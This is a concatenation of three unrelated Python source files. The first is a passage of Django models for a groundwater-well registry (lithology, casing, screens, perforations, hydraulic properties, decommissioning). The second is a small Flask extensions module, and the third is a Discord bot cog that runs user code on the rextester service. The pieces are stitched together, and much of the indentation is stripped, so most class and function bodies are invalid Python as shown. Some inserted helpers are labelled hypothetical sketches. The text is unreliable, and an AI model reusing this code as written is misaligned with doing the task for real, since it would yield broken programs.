Not all fields are provided in every report or edit, and this model
helps track which fields the user intended to update.
"""
activity_submission = models.OneToOneField(ActivitySubmission, on_delete=models.PROTECT, primary_key=True, db_column="filing_number", related_name="fields_provided")
well_activity_type = models.BooleanField(default=False)
well_status = models.BooleanField(default=False)
well_publication_status = models.BooleanField(default=False)
well_class = models.BooleanField(default=False)
well_subclass = models.BooleanField(default=False)
intended_water_use = models.BooleanField(default=False)
person_responsible = models.BooleanField(default=False)
company_of_person_responsible = models.BooleanField(default=False)
driller_name = models.BooleanField(default=False)
consultant_name = models.BooleanField(default=False)
consultant_company = models.BooleanField(default=False)
work_start_date = models.BooleanField(default=False)
work_end_date = models.BooleanField(default=False)
construction_start_date = models.BooleanField(default=False)
construction_end_date = models.BooleanField(default=False)
alteration_start_date = models.BooleanField(default=False)
alteration_end_date = models.BooleanField(default=False)
decommission_start_date = models.BooleanField(default=False)
decommission_end_date = models.BooleanField(default=False)
owner_full_name = models.BooleanField(default=False)
owner_mailing_address = models.BooleanField(default=False)
owner_city = models.BooleanField(default=False)
owner_province_state = models.BooleanField(default=False)
owner_postal_code = models.BooleanField(default=False)
owner_email = models.BooleanField(default=False)
owner_tel = models.BooleanField(default=False)
street_address = models.BooleanField(default=False)
city = models.BooleanField(default=False)
legal_lot = models.BooleanField(default=False)
legal_plan = models.BooleanField(default=False)
legal_district_lot = models.BooleanField(default=False)
legal_block = models.BooleanField(default=False)
legal_section = models.BooleanField(default=False)
legal_township = models.BooleanField(default=False)
legal_range = models.BooleanField(default=False)
land_district = models.BooleanField(default=False)
legal_pid = models.BooleanField(default=False)
well_location_description = models.BooleanField(default=False)
identification_plate_number = models.BooleanField(default=False)
well_identification_plate_attached = models.BooleanField(default=False)
id_plate_attached_by = models.BooleanField(default=False)
geom = models.BooleanField(default=False)
coordinate_acquisition_code = models.BooleanField(default=False)
ground_elevation = models.BooleanField(default=False)
ground_elevation_method = models.BooleanField(default=False)
drilling_methods = models.BooleanField(default=False)
well_orientation = models.BooleanField(default=False)
well_orientation_status = models.BooleanField(default=False)
water_supply_system_name = models.BooleanField(default=False)
water_supply_system_well_name = models.BooleanField(default=False)
surface_seal_material = models.BooleanField(default=False)
surface_seal_depth = models.BooleanField(default=False)
surface_seal_thickness = models.BooleanField(default=False)
surface_seal_method = models.BooleanField(default=False)
backfill_above_surface_seal = models.BooleanField(default=False)
backfill_above_surface_seal_depth = models.BooleanField(default=False)
backfill_depth = models.BooleanField(default=False)
backfill_type = models.BooleanField(default=False)
liner_material = models.BooleanField(default=False)
liner_diameter = models.BooleanField(default=False)
liner_thickness = models.BooleanField(default=False)
liner_from = models.BooleanField(default=False)
liner_to = models.BooleanField(default=False)
screen_intake_method = models.BooleanField(default=False)
screen_type = models.BooleanField(default=False)
screen_material = models.BooleanField(default=False)
other_screen_material = models.BooleanField(default=False)
screen_opening = models.BooleanField(default=False)
screen_bottom = models.BooleanField(default=False)
other_screen_bottom = models.BooleanField(default=False)
screen_information = models.BooleanField(default=False)
filter_pack_from = models.BooleanField(default=False)
filter_pack_to = models.BooleanField(default=False)
filter_pack_thickness = models.BooleanField(default=False)
filter_pack_material = models.BooleanField(default=False)
filter_pack_material_size = models.BooleanField(default=False)
development_methods = models.BooleanField(default=False)
development_hours = models.BooleanField(default=False)
development_notes = models.BooleanField(default=False)
water_quality_characteristics = models.BooleanField(default=False)
water_quality_colour = models.BooleanField(default=False)
water_quality_odour = models.BooleanField(default=False)
total_depth_drilled = models.BooleanField(default=False)
finished_well_depth = models.BooleanField(default=False)
final_casing_stick_up = models.BooleanField(default=False)
bedrock_depth = models.BooleanField(default=False)
static_water_level = models.BooleanField(default=False)
well_yield = models.BooleanField(default=False)
artesian_flow = models.BooleanField(default=False)
artesian_pressure = models.BooleanField(default=False)
artesian_pressure_head = models.BooleanField(default=False)
artesian_conditions = models.BooleanField(default=False)
well_cap_type = models.BooleanField(default=False)
well_disinfected = models.BooleanField(default=False)
well_disinfected_status = models.BooleanField(default=False)
comments = models.BooleanField(default=False)
internal_comments = models.BooleanField(default=False)
alternative_specs_submitted = models.BooleanField(default=False)
well_yield_unit = models.BooleanField(default=False)
diameter = models.BooleanField(default=False)
ems = models.BooleanField(default=False)
observation_well_number = models.BooleanField(default=False)
observation_well_status = models.BooleanField(default=False)
aquifer = models.BooleanField(default=False)
decommission_reason = models.BooleanField(default=False)
decommission_method = models.BooleanField(default=False)
decommission_sealant_material = models.BooleanField(default=False)
decommission_backfill_material = models.BooleanField(default=False)
decommission_details = models.BooleanField(default=False)
aquifer_vulnerability_index = models.BooleanField(default=False)
storativity = models.BooleanField(default=False)
transmissivity = models.BooleanField(default=False)
hydraulic_conductivity = models.BooleanField(default=False)
specific_storage = models.BooleanField(default=False)
specific_yield = models.BooleanField(default=False)
testing_method = models.BooleanField(default=False)
testing_duration = models.BooleanField(default=False)
analytic_solution_type = models.BooleanField(default=False)
boundary_effect = models.BooleanField(default=False)
aquifer_lithology = models.BooleanField(default=False)
yield_estimation_method = models.BooleanField(default=False)
yield_estimation_rate = models.BooleanField(default=False)
yield_estimation_duration = models.BooleanField(default=False)
static_level_before_test = models.BooleanField(default=False)
drawdown = models.BooleanField(default=False)
hydro_fracturing_performed = models.BooleanField(default=False)
hydro_fracturing_yield_increase = models.BooleanField(default=False)
recommended_pump_depth = models.BooleanField(default=False)
recommended_pump_rate = models.BooleanField(default=False)
lithologydescription_set = models.BooleanField(default=False)
casing_set = models.BooleanField(default=False)
decommission_description_set = models.BooleanField(default=False)
screen_set = models.BooleanField(default=False)
linerperforation_set = models.BooleanField(default=False)
class Meta:
db_table = 'fields_provided'
class LithologyDescription(AuditModel):
"""
Lithology information details
"""
lithology_description_guid = models.UUIDField(
primary_key=True, default=uuid.uuid4, editable=False)
activity_submission = models.ForeignKey(
ActivitySubmission, db_column='filing_number', on_delete=models.PROTECT, blank=True, null=True,
related_name='lithologydescription_set')
well = models.ForeignKey(
Well, db_column='well_tag_number', on_delete=models.PROTECT, blank=True, null=True,
related_name='lithologydescription_set',
db_comment=('The file number assigned to a particular well in the province\'s Groundwater '
'Wells and Aquifers application.'))
start = models.DecimalField(
max_digits=7, decimal_places=2, verbose_name='From',
blank=True, null=True,
db_column='lithology_from',
validators=[MinValueValidator(Decimal('0.00'))],
db_comment=('Depth below ground surface of the start of the lithology material for a particular '
'lithology layer, as observed during the construction or alteration of a well, '
'measured in feet.'))
end = models.DecimalField(
max_digits=7, decimal_places=2, verbose_name='To',
db_column='lithology_to',
blank=True, null=True, validators=[MinValueValidator(Decimal('0.01'))],
db_comment=('Depth below ground surface of the end of the lithology material for a particular '
'lithology layer as observed during the construction or alteration of a well, measured '
'in feet.'))
lithology_raw_data = models.CharField(
max_length=250, blank=True, null=True, verbose_name='Raw Data',
db_comment=('Lithologic material as described verbatim by the driller (not necessarily using '
'standardized terms).'))
lithology_description = models.ForeignKey(
LithologyDescriptionCode,
db_column='lithology_description_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name="Description",
db_comment=('Standard terms used to characterize the different qualities of lithologic'
' materials. E.g. dry, loose, weathered, soft.'))
lithology_colour = models.ForeignKey(
LithologyColourCode, db_column='lithology_colour_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Colour',
db_comment=('Valid options for the colour of the lithologic material identified at time of'
' drilling. E.g. Black, dark, tan, rust-coloured'))
lithology_hardness = models.ForeignKey(
LithologyHardnessCode, db_column='lithology_hardness_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Hardness',
db_comment=('The hardness of the material that a well is drilled into (the lithology), e.g. Very'
' hard, Medium, Very Soft.'))
lithology_material = models.ForeignKey(
LithologyMaterialCode, db_column='lithology_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name="Material",
db_comment=('Description of the lithologic material using standardized terms, '
'e.g. Rock, Clay, Sand, Unspecified.'))
water_bearing_estimated_flow = models.DecimalField(
max_digits=10, decimal_places=4, blank=True, null=True, verbose_name='Water Bearing Estimated Flow')
water_bearing_estimated_flow_units = models.ForeignKey(
WellYieldUnitCode, db_column='well_yield_unit_code', on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Units')
lithology_observation = models.CharField(
max_length=250, blank=True, null=True, verbose_name='Observations',
db_comment=('Free form text used by the driller to describe observations made of the well '
'lithology including, but not limited to, the lithologic material.'))
bedrock_material = models.ForeignKey(
BedrockMaterialCode, db_column='bedrock_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Bedrock Material',
db_comment=('Code for the bedrock material encountered during drilling and reported in'
' lithologic description.'))
bedrock_material_descriptor = models.ForeignKey(
BedrockMaterialDescriptorCode, db_column='bedrock_material_descriptor_code', on_delete=models.PROTECT,
blank=True, null=True, verbose_name='Descriptor',
db_comment=('Code for adjective that describes the characteristics of the bedrock material in'
' more detail.'))
lithology_structure = models.ForeignKey(LithologyStructureCode, db_column='lithology_structure_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Bedding')
lithology_moisture = models.ForeignKey(LithologyMoistureCode, db_column='lithology_moisture_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Moisture')
surficial_material = models.ForeignKey(SurficialMaterialCode, db_column='surficial_material_code',
related_name='surficial_material_set', on_delete=models.PROTECT,
blank=True, null=True, verbose_name='Surficial Material')
secondary_surficial_material = models.ForeignKey(SurficialMaterialCode,
db_column='secondary_surficial_material_code',
related_name='secondary_surficial_material_set',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Secondary Surficial Material')
lithology_sequence_number = models.BigIntegerField(blank=True, null=True)
class Meta:
db_table = 'lithology_description'
ordering = ["start", "end"]
db_table_comment = ('Describes the different lithologic qualities, characteristics, and materials found '
'at different depths while drilling.')
db_column_supplemental_comments = {
"bedrock_material_code":"Code for the bedrock material encountered during drilling and reported in lithologic description. ",
"lithology_moisture_code":"Code that describes the level of water within the lithologic layer. i.e. Dry, Damp, Moist, Wet",
"lithology_sequence_number":"Check with developers to see if this is being used, or if it can be deleted.",
"water_bearing_estimated_flow":"Estimated flow of water within the lithologic layer, either recorded in US Gallons Per Minute or as per the well_yield_unit_code column.",
"well_tag_number":"System generated sequential number assigned to each well. It is widely used by groundwater staff as it is the only consistent unique identifier for each well. It is different from a well ID plate number.",
}
def __str__(self):
if self.activity_submission:
return 'activity_submission {} {} {}'.format(self.activity_submission, self.start,
self.end)
else:
return 'well {} {} {}'.format(self.well, self.start, self.end)
class PerforationBase(AuditModel):
"""
Perforation in a well liner
"""
liner_perforation_guid = models.UUIDField(primary_key=True, default=uuid.uuid4,
editable=False)
start = models.DecimalField(db_column='liner_perforation_from', max_digits=7, decimal_places=2,
verbose_name='Perforated From', blank=False,
validators=[MinValueValidator(Decimal('0.00'))])
end = models.DecimalField(db_column='liner_perforation_to', max_digits=7, decimal_places=2,
verbose_name='Perforated To', blank=False,
validators=[MinValueValidator(Decimal('0.01'))])
class Meta:
abstract = True
class LinerPerforation(PerforationBase):
"""
Perforation in a well liner
"""
well = models.ForeignKey(
Well, db_column='well_tag_number', on_delete=models.PROTECT, blank=True,
null=True, related_name='linerperforation_set',
        db_comment=('The file number assigned to a particular well in the province\'s Groundwater '
'Wells and Aquifers application.'))
class Meta:
ordering = ["start", "end"]
db_table = 'liner_perforation'
db_table_comment = ('Describes the depths at which the liner is perforated in a well to help improve '
'water flow at the bottom of the well. Some wells are perforated instead of having '
'a screen installed.')
db_column_supplemental_comments = {
"liner_perforation_from":"The depth at the top of the liner perforation, measured in feet below ground level.",
"liner_perforation_to":"The depth at the bottom of the liner perforation, measured in feet below ground level.",
"well_tag_number":"System generated sequential number assigned to each well. It is widely used by groundwater staff as it is the only consistent unique identifier for each well. It is different from a well ID plate number.",
}
def __str__(self):
return 'well {} {} {}'.format(self.well, self.start, self.end)
class ActivitySubmissionLinerPerforation(PerforationBase):
"""
Perforation in a well liner
"""
activity_submission = models.ForeignKey(ActivitySubmission, db_column='filing_number',
on_delete=models.PROTECT, blank=True, null=True,
related_name='linerperforation_set')
class Meta:
ordering = ["start", "end"]
db_table_comment = ('Describes the depths at which the liner is perforated in a well to help improve '
'water flow at the bottom of the well. Some wells are perforated instead of having '
'a screen installed.')
def __str__(self):
return 'activity_submission {} {} {}'.format(self.activity_submission,
self.start,
self.end)
class Casing(AuditModel):
"""
Casing information
A casing may be associated to a particular submission, or to a well.
"""
casing_guid = models.UUIDField(
primary_key=True, default=uuid.uuid4, editable=False)
activity_submission = models.ForeignKey(ActivitySubmission, db_column='filing_number',
on_delete=models.PROTECT, blank=True, null=True,
related_name='casing_set')
well = models.ForeignKey(
Well, db_column='well_tag_number', on_delete=models.PROTECT,
blank=True, null=True,
related_name='casing_set',
        db_comment=('The file number assigned to a particular well in the province\'s Groundwater '
'Wells and Aquifers application.'))
# 2018/Sep/26 - According to PO (Lindsay), diameter, start and end are required fields.
# There is however a lot of legacy data that does not have this field.
start = models.DecimalField(db_column='casing_from', max_digits=7, decimal_places=2, verbose_name='From',
null=True, blank=True, validators=[MinValueValidator(Decimal('0.00'))])
end = models.DecimalField(db_column='casing_to', max_digits=7, decimal_places=2, verbose_name='To',
null=True, blank=True, validators=[MinValueValidator(Decimal('0.01'))])
# NOTE: Diameter should be pulling from screen.diameter
diameter = models.DecimalField(
max_digits=8, decimal_places=3, verbose_name='Diameter', null=True,
blank=True, validators=[MinValueValidator(Decimal('0.5'))],
        db_comment=('The diameter as measured in inches of the casing of the well. There can be multiple '
'casings in a well, e.g. surface casing, and production casing. Diameter of casing made '
'available to the public is generally the production casing.'))
casing_code = models.ForeignKey(CasingCode, db_column='casing_code', on_delete=models.PROTECT,
verbose_name='Casing Type Code', null=True)
casing_material = models.ForeignKey(CasingMaterialCode, db_column='casing_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Casing Material Code')
wall_thickness = models.DecimalField(max_digits=6, decimal_places=3, verbose_name='Wall Thickness',
blank=True, null=True,
validators=[MinValueValidator(Decimal('0.01'))])
drive_shoe_status = models.ForeignKey(DriveShoeCode, db_column='drive_shoe_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Drive Shoe Code')
class Meta:
ordering = ["start", "end"]
db_table = 'casing'
db_table_comment = ('Piping or tubing installed in a well to support the sides of the well. The casing '
'is comprised of a production (inner tube) and surface (outer tube) and can be made '
'of a variety of materials.')
db_column_supplemental_comments = {
"casing_code":"Describes the casing component (piping or tubing installed in a well) as either production casing, surface casing (outer casing), or open hole.",
"casing_from":"The depth below ground level at which the casing begins. Measured in feet below ground level.",
"casing_to":"The depth below ground level at which the casing ends. Measured in feet below ground level.",
"diameter":"The diameter of the casing measured in inches. There can be multiple casings in a well, e.g. surface casing, and production casing. Diameter of casing made available to the public is generally the production casing.",
"drive_shoe_code":"Indicates Y or N if a drive shoe was used in the installation of the casing. A drive shoe is attached to the end of a casing and it helps protect it during installation.",
"wall_thickness":"The thickness of the casing wall, measured in inches.",
"well_tag_number":"System generated sequential number assigned to each well. It is widely used by groundwater staff as it is the only consistent unique identifier for each well. It is different from a well ID plate number.",
}
def __str__(self):
if self.activity_submission:
return 'activity_submission {} {} {}'.format(self.activity_submission, self.start, self.end)
else:
return 'well {} {} {}'.format(self.well, self.start, self.end)
def as_dict(self):
return {
"start": self.start,
"end": self.end,
"casing_guid": self.casing_guid,
"well_tag_number": self.well_tag_number,
"diameter": self.diameter,
"wall_thickness": self.wall_thickness,
"casing_material": self.casing_material,
"drive_shoe_status": self.drive_shoe_status
}
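# Hypothetical helper, not part of the original GWELLS code: the 2018/Sep/26 note above
# says diameter, start, and end should be required, but legacy records may lack them.
# A sketch of an audit query for such legacy casing rows could look like this.
def find_casings_missing_required_fields():
    """Return casings missing any of diameter, start, or end (legacy-data check)."""
    from django.db.models import Q
    return Casing.objects.filter(
        Q(diameter__isnull=True) | Q(start__isnull=True) | Q(end__isnull=True)
    )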
class Screen(AuditModel):
"""
Screen in a well
"""
screen_guid = models.UUIDField(
primary_key=True, default=uuid.uuid4, editable=False)
activity_submission = models.ForeignKey(ActivitySubmission, db_column='filing_number',
on_delete=models.PROTECT, blank=True, null=True,
related_name='screen_set')
well = models.ForeignKey(
Well, db_column='well_tag_number', on_delete=models.PROTECT, blank=True,
null=True, related_name='screen_set',
db_comment=('System generated sequential number assigned to each well. It is widely used by groundwater staff as it is the only consistent unique identifier for each well. It is different from a well ID plate number.'))
start = models.DecimalField(db_column='screen_from', max_digits=7, decimal_places=2, verbose_name='From',
blank=True, null=True, validators=[MinValueValidator(Decimal('0.00'))])
end = models.DecimalField(db_column='screen_to', max_digits=7, decimal_places=2, verbose_name='To',
blank=False, null=True, validators=[MinValueValidator(Decimal('0.01'))])
diameter = models.DecimalField(db_column='screen_diameter', max_digits=7, decimal_places=2, verbose_name='Diameter',
blank=True, null=True,
validators=[MinValueValidator(Decimal('0.0'))])
assembly_type = models.ForeignKey(
ScreenAssemblyTypeCode, db_column='screen_assembly_type_code', on_delete=models.PROTECT, blank=True,
null=True)
slot_size = models.DecimalField(max_digits=7, decimal_places=2, verbose_name='Slot Size',
blank=True, null=True, validators=[MinValueValidator(Decimal('0.00'))])
class Meta:
db_table = 'screen'
ordering = ['start', 'end']
db_table_comment = ('Describes the screen type, diameter of screen, and the depth at which the screen is'
' installed in a well.')
def __str__(self):
if self.activity_submission:
return 'activity_submission {} {} {}'.format(self.activity_submission, self.start,
self.end)
else:
return 'well {} {} {}'.format(self.well, self.start, self.end)
class WaterQualityColour(CodeTableModel):
"""
Colour choices for describing water quality
"""
code = models.CharField(primary_key=True, max_length=32,
db_column='water_quality_colour_code')
description = models.CharField(max_length=100)
class Meta:
db_table = 'water_quality_colour_code'
db_table_comment = ('Valid values of the colour of the water as recorded at time of work. E.g. Orange,'
' Black, Clear, Other')
def __str__(self):
return self.description
class HydraulicProperty(AuditModel):
"""
Hydraulic properties of the well, usually determined via tests.
"""
hydraulic_property_guid = models.UUIDField(
primary_key=True, default=uuid.uuid4, editable=False)
well = models.ForeignKey(
Well, db_column='well_tag_number', to_field='well_tag_number',
on_delete=models.PROTECT, blank=False, null=False,
        db_comment=('The file number assigned to a particular well in the province\'s Groundwater '
'Wells and Aquifers application.'))
avi = models.DecimalField(
max_digits=10, decimal_places=0, blank=True, null=True, verbose_name='AVI')
storativity = models.DecimalField(
max_digits=8, decimal_places=7, blank=True, null=True, verbose_name='Storativity')
transmissivity = models.DecimalField(
max_digits=30, decimal_places=10, blank=True, null=True, verbose_name='Transmissivity')
hydraulic_conductivity = models.TextField(
max_length=100,
blank=True,
null=True,
verbose_name='Hydraulic Conductivity')
specific_storage = models.TextField(
max_length=100,
blank=True,
null=True,
verbose_name='Specific Storage')
specific_yield = models.DecimalField(
max_digits=5, decimal_places=2, blank=True, null=True, verbose_name='Specific Yield')
testing_method = models.TextField(
max_length=100,
blank=True,
null=True,
verbose_name='Testing Method')
testing_duration = models.PositiveIntegerField(blank=True, null=True)
analytic_solution_type = models.DecimalField(
max_digits=5, decimal_places=2, blank=True, null=True, verbose_name='Analytic Solution Type')
boundary_effect = models.DecimalField(
max_digits=5, decimal_places=2, blank=True, null=True, verbose_name='Boundary Effect')
class Meta:
db_table = 'hydraulic_property'
verbose_name_plural = 'Hydraulic Properties'
db_table_comment = 'Placeholder table comment.'
db_column_supplemental_comments = {
"analytic_solution_type":"The mathematical solution to the groundwater flow equation used to fit the observational data and estimate hydraulic parameters e.g. Theis 1935",
"avi":"The Aquifer Vulnerability Index (AVI) method for calculating aquifer vulnerability to contamination based on the thickness of each sedimentary unit above the uppermost aquifer and estimated hydraulic conductivity of each of these layers. ",
"boundary_effect":"Identification of any boundary effects observed during hydraulic testing (e.g. specified head to represent streams or no-flow to represent a low conductivity interface) ",
"hydraulic_conductivity":"Hydraulic conductivity estimated from hydraulic testing in metres per second.",
"specific_storage":"Specific Storage estimated from hydraulic testing in units of per metre of aquifer thickness.",
"specific_yield":"Specific Yield estimated from hydraulic testing (dimensionless).",
"storativity":"Storativity estimated from hydraulic testing (dimensionless).",
"testing_duration":"The duration of the hydraulic testing period. For consistency, do not include the recovery period.",
"testing_method":"Identification of the testing method (e.g.basic pumping test, pumping test with monitoring wells, single-well-response/slug test, constant head).",
"transmissivity":"Transmissivity estimated from hydraulic testing.",
"well_tag_number":"System generated sequential number assigned to each well. It is widely used by groundwater staff as it is the only consistent unique identifier for each well. It is different from a well ID plate number.",
}
def __str__(self):
return '{} - {}'.format(self.well, self.hydraulic_property_guid)
class DecommissionMaterialCode(BasicCodeTableModel):
"""Codes for decommission materials"""
code = models.CharField(primary_key=True, max_length=30,
db_column='decommission_material_code')
description = models.CharField(max_length=100)
    db_table_comment = ('Describes the material used to fill a well when decommissioned. E.g. Bentonite'
' chips, Native sand or gravel, Commercial gravel/pea gravel.')
def __str__(self):
return '{} - {}'.format(self.code, self.description)
class DecommissionDescription(AuditModel):
"""Provides a description of the ground conditions (between specified start and end depth) for
decommissioning"""
decommission_description_guid = models.UUIDField(
primary_key=True, default=uuid.uuid4)
activity_submission = models.ForeignKey(ActivitySubmission, db_column='filing_number',
on_delete=models.PROTECT, blank=True, null=True,
related_name='decommission_description_set')
well = models.ForeignKey(
Well, db_column='well_tag_number', on_delete=models.PROTECT, blank=True,
null=True, related_name='decommission_description_set',
db_comment=('System generated sequential number assigned to each well. It is widely used by groundwater staff as it is the only consistent unique identifier for each well. It is different from a well ID plate number.'))
start = models.DecimalField(db_column='decommission_description_from', max_digits=7, decimal_places=2,
verbose_name='Decommissioned From', blank=False,
validators=[MinValueValidator(Decimal('0.00'))])
end = models.DecimalField(db_column='decommission_description_to', max_digits=7, decimal_places=2,
verbose_name='Decommissioned To', blank=False,
validators=[MinValueValidator(Decimal('0.01'))])
material = models.ForeignKey(DecommissionMaterialCode, db_column='decommission_material_code',
on_delete=models.PROTECT)
observations = models.CharField(max_length=255, null=True, blank=True)
    db_table_comment = ('A cross reference table maintaining the list of wells that have been decommissioned'
                        ' and the materials used to fill the well when decommissioned. E.g. Bentonite chips,'
' Native sand or gravel, Commercial gravel/pea gravel.')
|
from flask_login import LoginManager
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
login_manager = LoginManager()
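# Sketch only: how these shared extension instances are typically bound to an app in an
# application-factory setup. The factory name and the "config.Config" path are
# assumptions, not part of the original snippet.
def create_app(config_object="config.Config"):
    from flask import Flask

    app = Flask(__name__)
    app.config.from_object(config_object)

    # Bind the module-level extensions to this application instance.
    db.init_app(app)
    login_manager.init_app(app)
    return app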
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Nekozilla is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Nekozilla is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Nekozilla. If not, see <https://www.gnu.org/licenses/>.
"""
Rextester cog interface.
"""
import neko3.cog
import neko3.converters
from neko3 import neko_commands
from neko3 import pagination
from . import utils
from .toolchains import rextester
class RextesterCog(neko3.cog.CogBase):
@neko_commands.group(
name="rextester",
invoke_without_command=True,
aliases=["rxt", "cc", "compile"],
brief="Attempts to execute the code using [rextester.](http://rextester.com)",
)
async def rextester_group(self, ctx, *, source):
"""
Attempts to execute some code by detecting the language in the
syntax highlighting. You MUST format the code using markdown-formatted
code blocks. Please, please, PLEASE read this before saying "it is
broken!"
This provides many more languages than coliru does, however, it is
mainly untested and will probably break in a lot of places. It also
has much less functionality. Many languages have to be formatted
in a specific way or have specific variable names or namespaces.
Run `cc help` to view a list of the supported languages, or
`cc help <lang>` to view the help for a specific language.
"""
code_block = utils.code_block_re.search(source)
if not code_block or len(code_block.groups()) < 2:
booklet = pagination.StringNavigatorFactory()
booklet.add_line(
"I couldn't detect a valid language in your "
"syntax highlighting... try again by editing "
"your initial message."
)
booklet = booklet.build(ctx)
return await utils.start_and_listen_to_edit(ctx, booklet)
# Extract the code
language, source = code_block.groups()
language = language.lower()
if language not in rextester.Language.__members__:
booklet = pagination.StringNavigatorFactory()
booklet.add_line("Doesn't look like I support that language. " "Run `coliru help` for a list.")
booklet = booklet.build(ctx)
return await utils.start_and_listen_to_edit(ctx, booklet)
booklet = pagination.StringNavigatorFactory(prefix="```markdown", suffix="```", max_lines=15)
lang_no = rextester.Language.__members__[language]
async with ctx.typing():
response = await rextester.execute(lang_no, source)
if response.errors:
booklet.add_line("> ERRORS:")
booklet.add_line(response.errors)
if response.warnings:
booklet.add_line("> WARNINGS:")
booklet.add_line(response.warnings)
if response.result:
booklet.add_line("> OUTPUT:")
booklet.add_line(response.result)
booklet.add_line(f"Interpreted as {language.lower()} source; {response.stats}")
if response.files:
booklet.add_line(f"- {len(response.files)} file(s) included. Bug my dev to implement this properly!")
booklet = booklet.build(ctx)
await utils.start_and_listen_to_edit(ctx, booklet)
@rextester_group.command(name="help", brief="Shows help for supported languages.")
async def help_command(self, ctx, *, language: neko3.converters.clean_content = None):
"""
Shows all supported languages and their markdown highlighting
syntax expected to invoke them correctly.
"""
if not language:
booklet = pagination.StringNavigatorFactory(max_lines=20)
booklet.add_line("**Supported languages**")
for lang in sorted(rextester.Language.__members__.keys()):
lang = lang.lower()
booklet.add_line(f"- {lang.title()} -- `{ctx.prefix}rxt " f"ˋˋˋ{lang} ...`")
booklet.start(ctx)
else:
await ctx.send("There is nothing here yet. The developer has been shot as a result.")
|